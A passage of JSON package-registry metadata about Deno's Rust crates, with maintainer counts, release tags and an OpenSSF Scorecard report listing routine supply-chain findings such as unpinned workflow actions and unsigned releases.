ohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ipcs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ipcs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ipcs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ipcs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ipcs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_ipcs/codemeta","maintainers":[{"uuid":"200676","login":"Cassielxd","name":"Cassie","email":null,"url":"https://github.com/Cassielxd","packages_count":19,"html_url":"https://crates.io/users/Cassielxd","role":null,"created_at":"2024-09-06T06:53:25.492Z","updated_at":"2024-09-06T06:53:25.492Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/Cassielxd/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11644473,"name":"deno_npm_installer","ecosystem":"cargo","description":"Installer of npm packages used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":54,"first_release_published_at":"2025-05-15T20:12:28.542Z","latest_release_published_at":"2026-08-27T15:22:43.384Z","latest_release_number":"0.53.0","last_synced_at":"2026-09-07T22:55:10.250Z","created_at":"2025-05-15T20:15:15.390Z","updated_at":"2026-09-07T22:55:10.251Z","registry_url":"https://crates.io/crates/deno_npm_installer/","install_command":"cargo install deno_npm_installer","documentation_url":"https://docs.rs/deno_npm_installer/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"